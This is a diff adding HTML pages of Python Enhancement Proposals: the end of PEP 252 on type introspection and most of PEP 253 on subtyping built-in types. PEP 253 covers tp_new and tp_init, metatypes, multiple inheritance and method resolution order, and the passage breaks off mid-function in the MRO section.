+'__lt__', '__mul__', '__ne__', '__new__', '__radd__',
+'__repr__', '__rmul__', '__setitem__', '__setslice__', 'append',
+'count', 'extend', 'index', 'insert', 'pop', 'remove',
+'reverse', 'sort']
+>>>
+
+
+

The new introspection API gives more information than the old one: +in addition to the regular methods, it also shows the methods that +are normally invoked through special notations, e.g. __iadd__ +(+=), __len__ (len), __ne__ (!=). +You can invoke any method from this list directly:

+
>>> a = ['tic', 'tac']
+>>> T.__len__(a)          # same as len(a)
+2
+>>> T.append(a, 'toe')    # same as a.append('toe')
+>>> a
+['tic', 'tac', 'toe']
+>>>
+
+
+

This is just like it is for user-defined classes.

+

Notice a familiar yet surprising name in the list: __init__. This +is the domain of PEP 253.

+
+
+

Backwards compatibility

+

XXX

+
+
+

Warnings and Errors

+

XXX

+
+
+

Implementation

+

A partial implementation of this PEP is available from CVS as a +branch named “descr-branch”. To experiment with this +implementation, proceed to check out Python from CVS according to +the instructions at http://sourceforge.net/cvs/?group_id=5470 but +add the arguments “-r descr-branch” to the cvs checkout command. +(You can also start with an existing checkout and do “cvs update +-r descr-branch”.) For some examples of the features described +here, see the file Lib/test/test_descr.py.

+

Note: the code in this branch goes way beyond this PEP; it is also +the experimentation area for PEP 253 (Subtyping Built-in Types).

+
+
+

References

+

XXX

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0252.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0253/index.html b/pep-0253/index.html new file mode 100644 index 00000000000..209c5a12320 --- /dev/null +++ b/pep-0253/index.html @@ -0,0 +1,981 @@ PEP 253 – Subtyping Built-in Types | peps.python.org
+
+


+ + +
+
+
+

PEP 253 – Subtyping Built-in Types

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes additions to the type object API that will allow +the creation of subtypes of built-in types, in C and in Python.

+

[Editor’s note: the ideas described in this PEP have been incorporated +into Python. The PEP no longer accurately describes the implementation.]

+
+
+

Introduction

+

Traditionally, types in Python have been created statically, by +declaring a global variable of type PyTypeObject and initializing +it with a static initializer. The slots in the type object +describe all aspects of a Python type that are relevant to the +Python interpreter. A few slots contain dimensional information +(like the basic allocation size of instances), others contain +various flags, but most slots are pointers to functions to +implement various kinds of behaviors. A NULL pointer means that +the type does not implement the specific behavior; in that case +the system may provide a default behavior or raise an exception +when the behavior is invoked for an instance of the type. Some +collections of function pointers that are usually defined together +are obtained indirectly via a pointer to an additional structure +containing more function pointers.

+

While the details of initializing a PyTypeObject structure haven’t +been documented as such, they are easily gleaned from the examples +in the source code, and I am assuming that the reader is +sufficiently familiar with the traditional way of creating new +Python types in C.

+

This PEP will introduce the following features:

+
    +
  • a type can be a factory function for its instances
  • +
  • types can be subtyped in C
  • +
  • types can be subtyped in Python with the class statement
  • +
  • multiple inheritance from types is supported (insofar as +practical – you still can’t multiply inherit from list and +dictionary)
  • +
  • the standard coercion functions (int, tuple, str etc.) will +be redefined to be the corresponding type objects, which serve +as their own factory functions
  • +
  • a class statement can contain a __metaclass__ declaration, +specifying the metaclass to be used to create the new class
  • +
  • a class statement can contain a __slots__ declaration, +specifying the specific names of the instance variables +supported
  • +
+

This PEP builds on PEP 252, which adds standard introspection to +types; for example, when a particular type object initializes the +tp_hash slot, that type object has a __hash__ method when +introspected. PEP 252 also adds a dictionary to type objects +which contains all methods. At the Python level, this dictionary +is read-only for built-in types; at the C level, it is accessible +directly (but it should not be modified except as part of +initialization).

+

For binary compatibility, a flag bit in the tp_flags slot +indicates the existence of the various new slots in the type +object introduced below. Types that don’t have the +Py_TPFLAGS_HAVE_CLASS bit set in their tp_flags slot are assumed +to have NULL values for all the subtyping slots. (Warning: the +current implementation prototype is not yet consistent in its +checking of this flag bit. This should be fixed before the final +release.)

+

In current Python, a distinction is made between types and +classes. This PEP together with PEP 254 will remove that +distinction. However, for backwards compatibility the distinction +will probably remain for years to come, and without PEP 254, the +distinction is still large: types ultimately have a built-in type +as a base class, while classes ultimately derive from a +user-defined class. Therefore, in the rest of this PEP, I will +use the word type whenever I can – including base type or +supertype, derived type or subtype, and metatype. However, +sometimes the terminology necessarily blends, for example an +object’s type is given by its __class__ attribute, and subtyping +in Python is spelled with a class statement. If further +distinction is necessary, user-defined classes can be referred to +as “classic” classes.

+
+
+

About metatypes

+

Inevitably the discussion comes to metatypes (or metaclasses). +Metatypes are nothing new in Python: Python has always been able +to talk about the type of a type:

+
>>> a = 0
+>>> type(a)
+<type 'int'>
+>>> type(type(a))
+<type 'type'>
+>>> type(type(type(a)))
+<type 'type'>
+>>>
+
+
+

In this example, type(a) is a “regular” type, and type(type(a)) is +a metatype. While as distributed all types have the same metatype +(PyType_Type, which is also its own metatype), this is not a +requirement, and in fact a useful and relevant 3rd party extension +(ExtensionClasses by Jim Fulton) creates an additional metatype. +The type of classic classes, known as types.ClassType, can also be +considered a distinct metatype.

+

A feature closely connected to metatypes is the “Don Beaudry +hook”, which says that if a metatype is callable, its instances +(which are regular types) can be subclassed (really subtyped) +using a Python class statement. I will use this rule to support +subtyping of built-in types, and in fact it greatly simplifies the +logic of class creation to always simply call the metatype. When +no base class is specified, a default metatype is called – the +default metatype is the “ClassType” object, so the class statement +will behave as before in the normal case. (This default can be +changed per module by setting the global variable __metaclass__.)

+

Python uses the concept of metatypes or metaclasses in a different +way than Smalltalk. In Smalltalk-80, there is a hierarchy of +metaclasses that mirrors the hierarchy of regular classes, +metaclasses map 1-1 to classes (except for some funny business at +the root of the hierarchy), and each class statement creates both +a regular class and its metaclass, putting class methods in the +metaclass and instance methods in the regular class.

+

Nice though this may be in the context of Smalltalk, it’s not +compatible with the traditional use of metatypes in Python, and I +prefer to continue in the Python way. This means that Python +metatypes are typically written in C, and may be shared between +many regular types. (It will be possible to subtype metatypes in +Python, so it won’t be absolutely necessary to write C to use +metatypes; but the power of Python metatypes will be limited. For +example, Python code will never be allowed to allocate raw memory +and initialize it at will.)

+

Metatypes determine various policies for types, such as what +happens when a type is called, how dynamic types are (whether a +type’s __dict__ can be modified after it is created), what the +method resolution order is, how instance attributes are looked +up, and so on.

+

I’ll argue that left-to-right depth-first is not the best +solution when you want to get the most use from multiple +inheritance.

+

I’ll argue that with multiple inheritance, the metatype of the +subtype must be a descendant of the metatypes of all base types.

+

I’ll come back to metatypes later.

+
+
+

Making a type a factory for its instances

+

Traditionally, for each type there is at least one C factory +function that creates instances of the type (PyTuple_New(), +PyInt_FromLong() and so on). These factory functions take care of +both allocating memory for the object and initializing that +memory. As of Python 2.0, they also have to interface with the +garbage collection subsystem, if the type chooses to participate +in garbage collection (which is optional, but strongly recommended +for so-called “container” types: types that may contain references +to other objects, and hence may participate in reference cycles).

+

In this proposal, type objects can be factory functions for their +instances, making the types directly callable from Python. This +mimics the way classes are instantiated. The C APIs for creating +instances of various built-in types will remain valid and in some +cases more efficient. Not all types will become their own factory +functions.

+

The type object has a new slot, tp_new, which can act as a factory +for instances of the type. Types are now callable, because the +tp_call slot is set in PyType_Type (the metatype); the function +looks for the tp_new slot of the type that is being called.

+

Explanation: the tp_call slot of a regular type object (such as +PyInt_Type or PyList_Type) defines what happens when instances +of that type are called; in particular, the tp_call slot in the +function type, PyFunction_Type, is the key to making functions +callable. As another example, PyInt_Type.tp_call is NULL, because +integers are not callable. The new paradigm makes type objects +callable. Since type objects are instances of their metatype +(PyType_Type), the metatype’s tp_call slot (PyType_Type.tp_call) +points to a function that is invoked when any type object is +called. Now, since each type has to do something different to +create an instance of itself, PyType_Type.tp_call immediately +defers to the tp_new slot of the type that is being called. +PyType_Type itself is also callable: its tp_new slot creates a new +type. This is used by the class statement (formalizing the Don +Beaudry hook, see above). And what makes PyType_Type callable? +The tp_call slot of its metatype – but since it is its own +metatype, that is its own tp_call slot!
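The same chain can be observed from Python with a toy metatype; Tracing below is a hypothetical example, written in the 2.2-era style, whose __call__ plays the role of the metatype's tp_call slot:

class Tracing(type):
    def __call__(cls, *args, **kwds):
        # tp_call of the metatype: report the call, then defer to
        # type.__call__, which invokes tp_new and then tp_init.
        print('creating an instance of %s' % cls.__name__)
        return type.__call__(cls, *args, **kwds)

# Python 2.2:  class C(object): __metaclass__ = Tracing
# Python 3:    class C(metaclass=Tracing)
# Either way, C() now reports itself before the instance appears.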

+

If the type’s tp_new slot is NULL, an exception is raised. +Otherwise, the tp_new slot is called. The signature for the +tp_new slot is

+
PyObject *tp_new(PyTypeObject *type,
+                 PyObject *args,
+                 PyObject *kwds)
+
+
+

where ‘type’ is the type whose tp_new slot is called, and ‘args’ +and ‘kwds’ are the sequential and keyword arguments to the call, +passed unchanged from tp_call. (The ‘type’ argument is used in +combination with inheritance, see below.)

+

There are no constraints on the object type that is returned, +although by convention it should be an instance of the given +type. It is not necessary that a new object is returned; a +reference to an existing object is fine too. The return value +should always be a new reference, owned by the caller.

+

Once the tp_new slot has returned an object, further initialization +is attempted by calling the tp_init() slot of the resulting +object’s type, if not NULL. This has the following signature:

+
int tp_init(PyObject *self,
+            PyObject *args,
+            PyObject *kwds)
+
+
+

It corresponds more closely to the __init__() method of classic +classes, and in fact is mapped to that by the slot/special-method +correspondence rules. The difference in responsibilities between +the tp_new() slot and the tp_init() slot lies in the invariants +they ensure. The tp_new() slot should ensure only the most +essential invariants, without which the C code that implements the +objects would break. The tp_init() slot should be used for +overridable user-specific initializations. Take for example the +dictionary type. The implementation has an internal pointer to a +hash table which should never be NULL. This invariant is taken +care of by the tp_new() slot for dictionaries. The dictionary +tp_init() slot, on the other hand, could be used to give the +dictionary an initial set of keys and values based on the +arguments passed in.

+

Note that for immutable object types, the initialization cannot be +done by the tp_init() slot: this would provide the Python user +with a way to change the initialization. Therefore, immutable +objects typically have an empty tp_init() implementation and do +all their initialization in their tp_new() slot.
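At the Python level this corresponds to __new__ (tp_new) and __init__ (tp_init). Here is a sketch of an immutable subtype that does all of its initialization in __new__; the Point class is illustrative, not from the PEP:

class Point(tuple):
    # Immutable: the coordinates must go through tuple's tp_new;
    # by the time __init__ runs, the contents can no longer change.
    def __new__(cls, x, y):
        return tuple.__new__(cls, (x, y))

p = Point(3, 4)
print(p)        # (3, 4)
print(p[0])     # 3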

+

You may wonder why the tp_new() slot shouldn’t call the tp_init() +slot itself. The reason is that in certain circumstances (like +support for persistent objects), it is important to be able to +create an object of a particular type without initializing it any +further than necessary. This may conveniently be done by calling +the tp_new() slot without calling tp_init(). It is also possible +that tp_init() is not called, or called more than once – its +operation should be robust even in these anomalous cases.

+

For some objects, tp_new() may return an existing object. For +example, the factory function for integers caches the integers -1 +through 99. This is permissible only when the type argument to +tp_new() is the type that defined the tp_new() function (in the +example, if type == &PyInt_Type), and when the tp_init() slot for +this type does nothing. If the type argument differs, the +tp_new() call is initiated by a derived type’s tp_new() to +create the object and initialize the base type portion of the +object; in this case tp_new() should always return a new object +(or raise an exception).

+
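The caching is observable from Python (a CPython implementation detail, not a language guarantee):

a = 10 + 10
b = 20
print a is b   # True in CPython: tp_new handed back the cached object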

Both tp_new() and tp_init() should receive exactly the same ‘args’ +and ‘kwds’ arguments, and both should check that the arguments are +acceptable, because they may be called independently.

+

There’s a third slot related to object creation: tp_alloc(). Its +responsibility is to allocate the memory for the object, +initialize the reference count (ob_refcnt) and the type pointer +(ob_type), and initialize the rest of the object to all zeros. It +should also register the object with the garbage collection +subsystem if the type supports garbage collection. This slot +exists so that derived types can override the memory allocation +policy (like which heap is being used) separately from the +initialization code. The signature is:

+
PyObject *tp_alloc(PyTypeObject *type, int nitems)
+
+
+

The type argument is the type of the new object. The nitems +argument is normally zero, except for objects with a variable +allocation size (basically strings, tuples, and longs). The +allocation size is given by the following expression:

+
type->tp_basicsize  +  nitems * type->tp_itemsize
+
+
+
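The formula can be checked from Python through the CPython-specific __basicsize__ and __itemsize__ attributes (a sketch, not part of this PEP's specification):

def alloc_size(tp, nitems=0):
    # Mirrors: type->tp_basicsize + nitems * type->tp_itemsize
    return tp.__basicsize__ + nitems * tp.__itemsize__

print alloc_size(int)        # fixed-size type: tp_itemsize is 0
print alloc_size(tuple, 3)   # variable-size type: grows with nitems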

The tp_alloc slot is only used for subclassable types. The tp_new() +function of the base class must call the tp_alloc() slot of the +type passed in as its first argument. It is the tp_new() +function’s responsibility to calculate the number of items. The +tp_alloc() slot will set the ob_size member of the new object if +the type->tp_itemsize member is nonzero.

+

(Note: in certain debugging compilation modes, the type structure already contained members named tp_alloc and tp_free, used as counters for the number of allocations and deallocations. These are renamed to tp_allocs and tp_deallocs.)

+

Standard implementations for tp_alloc() and tp_new() are +available. PyType_GenericAlloc() allocates an object from the +standard heap and initializes it properly. It uses the above +formula to determine the amount of memory to allocate, and takes +care of GC registration. The only reason not to use this +implementation would be to allocate objects from a different heap +(as is done by some very small frequently used objects like ints +and tuples). PyType_GenericNew() adds very little: it just calls +the type’s tp_alloc() slot with zero for nitems. But for mutable +types that do all their initialization in their tp_init() slot, +this may be just the ticket.

+
+
+

Preparing a type for subtyping

+

The idea behind subtyping is very similar to that of single +inheritance in C++. A base type is described by a structure +declaration (similar to the C++ class declaration) plus a type +object (similar to the C++ vtable). A derived type can extend the +structure (but must leave the names, order and type of the members +of the base structure unchanged) and can override certain slots in +the type object, leaving others the same. (Unlike C++ vtables, +all Python type objects have the same memory layout.)

+

The base type must do the following:

+
    +
  • Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
  • +
  • Declare and use the tp_new(), tp_alloc() and (optionally) tp_init() slots.
  • +
  • Declare and use tp_dealloc() and tp_free().
  • +
  • Export its object structure declaration.
  • +
  • Export a subtyping-aware type-checking macro.
  • +
+

The requirements and signatures for tp_new(), tp_alloc() and +tp_init() have already been discussed above: tp_alloc() should +allocate the memory and initialize it to mostly zeros; tp_new() +should call the tp_alloc() slot and then proceed to do the +minimally required initialization; tp_init() should be used for +more extensive initialization of mutable objects.

+

It should come as no surprise that there are similar conventions +at the end of an object’s lifetime. The slots involved are +tp_dealloc() (familiar to all who have ever implemented a Python +extension type) and tp_free(), the new kid on the block. (The +names aren’t quite symmetric; tp_free() corresponds to tp_alloc(), +which is fine, but tp_dealloc() corresponds to tp_new(). Maybe +the tp_dealloc slot should be renamed?)

+

The tp_free() slot should be used to free the memory and +unregister the object with the garbage collection subsystem, and +can be overridden by a derived class; tp_dealloc() should +deinitialize the object (usually by calling Py_XDECREF() for +various sub-objects) and then call tp_free() to deallocate the +memory. The signature for tp_dealloc() is the same as it always +was:

+
void tp_dealloc(PyObject *object)
+
+
+

The signature for tp_free() is the same as for tp_dealloc():

+
void tp_free(PyObject *object)
+
+
+

(In a previous version of this PEP, there was also a role reserved +for the tp_clear() slot. This turned out to be a bad idea.)

+

To be usefully subtyped in C, a type must export the structure +declaration for its instances through a header file, as it is +needed to derive a subtype. The type object for the base type +must also be exported.

+

If the base type has a type-checking macro (like PyDict_Check()), +this macro should be made to recognize subtypes. This can be done +by using the new PyObject_TypeCheck(object, type) macro, which +calls a function that follows the base class links.

+

The PyObject_TypeCheck() macro contains a slight optimization: it +first compares object->ob_type directly to the type argument, and +if this is a match, bypasses the function call. This should make +it fast enough for most situations.

+

Note that this change in the type-checking macro means that C +functions that require an instance of the base type may be invoked +with instances of the derived type. Before enabling subtyping of +a particular type, its code should be checked to make sure that +this won’t break anything. It has proved useful in the prototype +to add another type-checking macro for the built-in Python object +types, to check for exact type match too (for example, +PyDict_Check(x) is true if x is an instance of dictionary or of a +dictionary subclass, while PyDict_CheckExact(x) is true only if x +is a dictionary).

+
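The distinction maps directly onto Python-level checks (sketch; the MyDict name is hypothetical):

class MyDict(dict):
    pass

d = MyDict()
print isinstance(d, dict)   # True  -- like PyDict_Check: subtypes pass
print type(d) is dict       # False -- like PyDict_CheckExact: exact only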
+
+

Creating a subtype of a built-in type in C

+

The simplest form of subtyping is subtyping in C. It is the +simplest form because we can require the C code to be aware of +some of the problems, and it’s acceptable for C code that doesn’t +follow the rules to dump core. For added simplicity, it is +limited to single inheritance.

+

Let’s assume we’re deriving from a mutable base type whose +tp_itemsize is zero. The subtype code is not GC-aware, although +it may inherit GC-awareness from the base type (this is +automatic). The base type’s allocation uses the standard heap.

+

The derived type begins by declaring a type structure which +contains the base type’s structure. For example, here’s the type +structure for a subtype of the built-in list type:

+
typedef struct {
+    PyListObject list;
+    int state;
+} spamlistobject;
+
+
+

Note that the base type structure member (here PyListObject) must +be the first member of the structure; any following members are +additions. Also note that the base type is not referenced via a +pointer; the actual contents of its structure must be included! +(The goal is for the memory layout of the beginning of the +subtype instance to be the same as that of the base type +instance.)

+

Next, the derived type must declare a type object and initialize +it. Most of the slots in the type object may be initialized to +zero, which is a signal that the base type slot must be copied +into it. Some slots that must be initialized properly:

+
    +
  • The object header must be filled in as usual; the type should +be &PyType_Type.
  • +
  • The tp_basicsize slot must be set to the size of the subtype +instance struct (in the above example: sizeof(spamlistobject)).
  • +
  • The tp_base slot must be set to the address of the base type’s +type object.
  • +
  • If the derived type defines any pointer members, the tp_dealloc slot function requires special attention (see below); otherwise, it can be set to zero, to inherit the base type’s deallocation function.
  • +
  • The tp_flags slot must be set to the usual Py_TPFLAGS_DEFAULT +value.
  • +
  • The tp_name slot must be set; it is recommended to set tp_doc +as well (these are not inherited).
  • +
+

If the subtype defines no additional structure members (it only +defines new behavior, no new data), the tp_basicsize and the +tp_dealloc slots may be left set to zero.

+

The subtype’s tp_dealloc slot deserves special attention. If the +derived type defines no additional pointer members that need to be +DECREF’ed or freed when the object is deallocated, it can be set +to zero. Otherwise, the subtype’s tp_dealloc() function must call +Py_XDECREF() for any PyObject * members and the correct memory +freeing function for any other pointers it owns, and then call the +base class’s tp_dealloc() slot. This call has to be made via the +base type’s type structure, for example, when deriving from the +standard list type:

+
PyList_Type.tp_dealloc(self);
+
+
+

If the subtype wants to use a different allocation heap than the +base type, the subtype must override both the tp_alloc() and the +tp_free() slots. These will be called by the base class’s +tp_new() and tp_dealloc() slots, respectively.

+

To complete the initialization of the type, PyType_InitDict() must +be called. This replaces slots initialized to zero in the subtype +with the value of the corresponding base type slots. (It also +fills in tp_dict, the type’s dictionary, and does various other +initializations necessary for type objects.)

+

A subtype is not usable until PyType_InitDict() is called for it; +this is best done during module initialization, assuming the +subtype belongs to a module. An alternative for subtypes added to +the Python core (which don’t live in a particular module) would be +to initialize the subtype in their constructor function. It is +allowed to call PyType_InitDict() more than once; the second and +further calls have no effect. To avoid unnecessary calls, a test +for tp_dict==NULL can be made.

+

(During initialization of the Python interpreter, some types are +actually used before they are initialized. As long as the slots +that are actually needed are initialized, especially tp_dealloc, +this works, but it is fragile and not recommended as a general +practice.)

+

To create a subtype instance, the subtype’s tp_new() slot is +called. This should first call the base type’s tp_new() slot and +then initialize the subtype’s additional data members. To further +initialize the instance, the tp_init() slot is typically called. +Note that the tp_new() slot should not call the tp_init() slot; +this is up to tp_new()’s caller (typically a factory function). +There are circumstances where it is appropriate not to call +tp_init().

+
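In Python terms the same pattern looks like this (a sketch mirroring the spamlistobject example above):

class spamlist(list):
    def __new__(cls, *args, **kwds):
        self = list.__new__(cls)   # call the base type's tp_new first
        self.state = 0             # then initialize the subtype's data
        return self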

If a subtype defines a tp_init() slot, it should normally call the base type’s tp_init() slot first.

+

(XXX There should be a paragraph or two about argument passing +here.)

+
+
+

Subtyping in Python

+

The next step is to allow subtyping of selected built-in types +through a class statement in Python. Limiting ourselves to single +inheritance for now, here is what happens for a simple class +statement:

+
class C(B):
+    var1 = 1
+    def method1(self): pass
+    # etc.
+
+
+

The body of the class statement is executed in a fresh environment +(basically, a new dictionary used as local namespace), and then C +is created. The following explains how C is created.

+

Assume B is a type object. Since type objects are objects, and +every object has a type, B has a type. Since B is itself a type, +we also call its type its metatype. B’s metatype is accessible +via type(B) or B.__class__ (the latter notation is new for types; +it is introduced in PEP 252). Let’s say this metatype is M (for +Metatype). The class statement will create a new type, C. Since +C will be a type object just like B, we view the creation of C as +an instantiation of the metatype, M. The information that needs +to be provided for the creation of a subclass is:

+
    +
  • its name (in this example the string “C”);
  • +
  • its bases (a singleton tuple containing B);
  • +
  • the results of executing the class body, in the form of a dictionary (for example {"var1": 1, "method1": <function method1 at ...>, ...}).
  • +
+

The class statement will result in the following call:

+
C = M("C", (B,), dict)
+
+
+

where dict is the dictionary resulting from execution of the +class body. In other words, the metatype (M) is called.

+
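For a new-style base class whose metatype is type, the class statement and the direct call are interchangeable (a sketch; B, var1 and method1 are the names from the example above):

class B(object):
    pass

def method1(self):
    pass

C = type("C", (B,), {"var1": 1, "method1": method1})
print C.var1         # 1
print C().method1    # a bound method, as if defined by a class statement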

Note that even though the example has only one base, we still pass +in a (singleton) sequence of bases; this makes the interface +uniform with the multiple-inheritance case.

+

In current Python, this is called the “Don Beaudry hook” after its +inventor; it is an exceptional case that is only invoked when a +base class is not a regular class. For a regular base class (or +when no base class is specified), current Python calls +PyClass_New(), the C level factory function for classes, directly.

+

Under the new system this is changed so that Python always +determines a metatype and calls it as given above. When one or +more bases are given, the type of the first base is used as the +metatype; when no base is given, a default metatype is chosen. By +setting the default metatype to PyClass_Type, the metatype of +“classic” classes, the classic behavior of the class statement is +retained. This default can be changed per module by setting the +global variable __metaclass__.

+

There are two further refinements here. First, a useful feature +is to be able to specify a metatype directly. If the class +suite defines a variable __metaclass__, that is the metatype +to call. (Note that setting __metaclass__ at the module level +only affects class statements without a base class and without an +explicit __metaclass__ declaration; but setting __metaclass__ in a +class suite overrides the default metatype unconditionally.)

+
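A sketch of an explicit metatype selected via the class-suite __metaclass__ spelling described above (the Verbose name is hypothetical; Python 2.x syntax):

class Verbose(type):
    def __new__(meta, name, bases, dct):
        print "creating class", name
        return type.__new__(meta, name, bases, dct)

class C(object):
    __metaclass__ = Verbose   # overrides the default metatype for C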

Second, with multiple bases, not all bases need to have the same +metatype. This is called a metaclass conflict [1]. Some +metaclass conflicts can be resolved by searching through the set +of bases for a metatype that derives from all other given +metatypes. If such a metatype cannot be found, an exception is +raised and the class statement fails.

+

This conflict resolution can be implemented by the metatype +constructors: the class statement just calls the metatype of the first +base (or that specified by the __metaclass__ variable), and this +metatype’s constructor looks for the most derived metatype. If +that is itself, it proceeds; otherwise, it calls that metatype’s +constructor. (Ultimate flexibility: another metatype might choose +to require that all bases have the same metatype, or that there’s +only one base class, or whatever.)

+

(In [1], a new metaclass is automatically derived that is a +subclass of all given metaclasses. But since it is questionable +in Python how conflicting method definitions of the various +metaclasses should be merged, I don’t think this is feasible. +Should the need arise, the user can derive such a metaclass +manually and specify it using the __metaclass__ variable. It is +also possible to have a new metaclass that does this.)

+

Note that calling M requires that M itself has a type: the +meta-metatype. And the meta-metatype has a type, the +meta-meta-metatype. And so on. This is normally cut short at +some level by making a metatype be its own metatype. This is +indeed what happens in Python: the ob_type reference in +PyType_Type is set to &PyType_Type. In the absence of third party +metatypes, PyType_Type is the only metatype in the Python +interpreter.

+

(In a previous version of this PEP, there was one additional +meta-level, and there was a meta-metatype called “turtle”. This +turned out to be unnecessary.)

+

In any case, the work for creating C is done by M’s tp_new() slot. +It allocates space for an “extended” type structure, containing: +the type object; the auxiliary structures (as_sequence etc.); the +string object containing the type name (to ensure that this object +isn’t deallocated while the type object is still referencing it); and +some auxiliary storage (to be described later). It initializes this +storage to zeros except for a few crucial slots (for example, tp_name +is set to point to the type name) and then sets the tp_base slot to +point to B. Then PyType_InitDict() is called to inherit B’s slots. +Finally, C’s tp_dict slot is updated with the contents of the +namespace dictionary (the third argument to the call to M).

+
+
+

Multiple inheritance

+

The Python class statement supports multiple inheritance, and we +will also support multiple inheritance involving built-in types.

+

However, there are some restrictions. The C runtime architecture +doesn’t make it feasible to have a meaningful subtype of two +different built-in types except in a few degenerate cases. +Changing the C runtime to support fully general multiple +inheritance would be too much of an upheaval of the code base.

+

The main problem with multiple inheritance from different built-in +types stems from the fact that the C implementation of built-in +types accesses structure members directly; the C compiler +generates an offset relative to the object pointer and that’s +that. For example, the list and dictionary type structures each +declare a number of different but overlapping structure members. +A C function accessing an object expecting a list won’t work when +passed a dictionary, and vice versa, and there’s not much we could +do about this without rewriting all code that accesses lists and +dictionaries. This would be too much work, so we won’t do this.

+

The problem with multiple inheritance is caused by conflicting +structure member allocations. Classes defined in Python normally +don’t store their instance variables in structure members: they +are stored in an instance dictionary. This is the key to a +partial solution. Suppose we have the following two classes:

+
class A(dictionary):
+    def foo(self): pass
+
+class B(dictionary):
+    def bar(self): pass
+
+class C(A, B): pass
+
+
+

(Here, ‘dictionary’ is the type of built-in dictionary objects, +a.k.a. type({}) or {}.__class__ or types.DictType.) If we look at +the structure layout, we find that an A instance has the layout +of a dictionary followed by the __dict__ pointer, and a B instance +has the same layout; since there are no structure member layout +conflicts, this is okay.

+

Here’s another example:

+
class X(object):
+    def foo(self): pass
+
+class Y(dictionary):
+    def bar(self): pass
+
+class Z(X, Y): pass
+
+
+

(Here, ‘object’ is the base for all built-in types; its structure +layout only contains the ob_refcnt and ob_type members.) This +example is more complicated, because the __dict__ pointer for X +instances has a different offset than that for Y instances. Where +is the __dict__ pointer for Z instances? The answer is that the +offset for the __dict__ pointer is not hardcoded, it is stored in +the type object.

+

Suppose on a particular machine an ‘object’ structure is 8 bytes +long, and a ‘dictionary’ struct is 60 bytes, and an object pointer +is 4 bytes. Then an X structure is 12 bytes (an object structure +followed by a __dict__ pointer), and a Y structure is 64 bytes (a +dictionary structure followed by a __dict__ pointer). The Z +structure has the same layout as the Y structure in this example. +Each type object (X, Y and Z) has a “__dict__ offset” which is +used to find the __dict__ pointer. Thus, the recipe for looking +up an instance variable is:

+
  1. get the type of the instance
  2. get the __dict__ offset from the type object
  3. add the __dict__ offset to the instance pointer
  4. look in the resulting address to find a dictionary reference
  5. look up the instance variable name in that dictionary

Of course, this recipe can only be implemented in C, and I have +left out some details. But this allows us to use multiple +inheritance patterns similar to the ones we can use with classic +classes.

+
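The per-type __dict__ offset is nevertheless observable from Python, as the CPython-specific __dictoffset__ attribute (sketch):

class X(object):
    pass

print object.__dictoffset__   # 0: plain objects have no __dict__ pointer
print X.__dictoffset__        # nonzero: where X instances store __dict__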

XXX I should write up the complete algorithm here to determine +base class compatibility, but I can’t be bothered right now. Look +at best_base() in typeobject.c in the implementation mentioned +below.

+
+
+

MRO: Method resolution order (the lookup rule)

+

With multiple inheritance comes the question of method resolution +order: the order in which a class or type and its bases are +searched looking for a method of a given name.

+

In classic Python, the rule is given by the following recursive +function, also known as the left-to-right depth-first rule:

+
def classic_lookup(cls, name):
+    if cls.__dict__.has_key(name):
+        return cls.__dict__[name]
+    for base in cls.__bases__:
+        try:
+            return classic_lookup(base, name)
+        except AttributeError:
+            pass
+    raise AttributeError, name
+
+
+

The problem with this becomes apparent when we consider a “diamond +diagram”:

+
      class A:
+        ^ ^  def save(self): ...
+       /   \
+      /     \
+     /       \
+    /         \
+class B     class C:
+    ^         ^  def save(self): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

Arrows point from a subtype to its base type(s). This particular +diagram means B and C derive from A, and D derives from B and C +(and hence also, indirectly, from A).

+

Assume that C overrides the method save(), which is defined in the +base A. (C.save() probably calls A.save() and then saves some of +its own state.) B and D don’t override save(). When we invoke +save() on a D instance, which method is called? According to the +classic lookup rule, A.save() is called, ignoring C.save()!

+

This is not good. It probably breaks C (its state doesn’t get +saved), defeating the whole purpose of inheriting from C in the +first place.

+

Why was this not a problem in classic Python? Diamond diagrams +are rarely found in classic Python class hierarchies. Most class +hierarchies use single inheritance, and multiple inheritance is +usually confined to mix-in classes. In fact, the problem shown +here is probably the reason why multiple inheritance is unpopular +in classic Python.

+

Why will this be a problem in the new system? The ‘object’ type +at the top of the type hierarchy defines a number of methods that +can usefully be extended by subtypes, for example __getattr__().

+

(Aside: in classic Python, the __getattr__() method is not really +the implementation for the get-attribute operation; it is a hook +that only gets invoked when an attribute cannot be found by normal +means. This has often been cited as a shortcoming – some class +designs have a legitimate need for a __getattr__() method that +gets called for all attribute references. But then of course +this method has to be able to invoke the default implementation +directly. The most natural way is to make the default +implementation available as object.__getattr__(self, name).)

+

Thus, a classic class hierarchy like this:

+
class B     class C:
+    ^         ^  def __getattr__(self, name): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

will change into a diamond diagram under the new system:

+
      object:
+        ^ ^  __getattr__()
+       /   \
+      /     \
+     /       \
+    /         \
+class B     class C:
+    ^         ^  def __getattr__(self, name): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

and while in the original diagram C.__getattr__() is invoked, +under the new system with the classic lookup rule, +object.__getattr__() would be invoked!

+

Fortunately, there’s a lookup rule that’s better. It’s a bit +difficult to explain, but it does the right thing in the diamond +diagram, and it is the same as the classic lookup rule when there +are no diamonds in the inheritance graph (when it is a tree).

+

The new lookup rule constructs a list of all classes in the +inheritance diagram in the order in which they will be searched. +This construction is done at class definition time to save time. +To explain the new lookup rule, let’s first consider what such a +list would look like for the classic lookup rule. Note that in +the presence of diamonds the classic lookup visits some classes +multiple times. For example, in the ABCD diamond diagram above, +the classic lookup rule visits the classes in this order:

+
D, B, A, C, A
+
+
+

Note how A occurs twice in the list. The second occurrence is +redundant, since anything that could be found there would already +have been found when searching the first occurrence.

+

We use this observation to explain our new lookup rule. Using the +classic lookup rule, construct the list of classes that would be +searched, including duplicates. Now for each class that occurs in +the list multiple times, remove all occurrences except for the +last. The resulting list contains each ancestor class exactly +once (including the most derived class, D in the example).

+
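The rule is short enough to state as executable pseudocode (a sketch of the rule just described, not the CPython implementation):

def classic_order(cls):
    # The classic left-to-right, depth-first order, duplicates included.
    order = [cls]
    for base in cls.__bases__:
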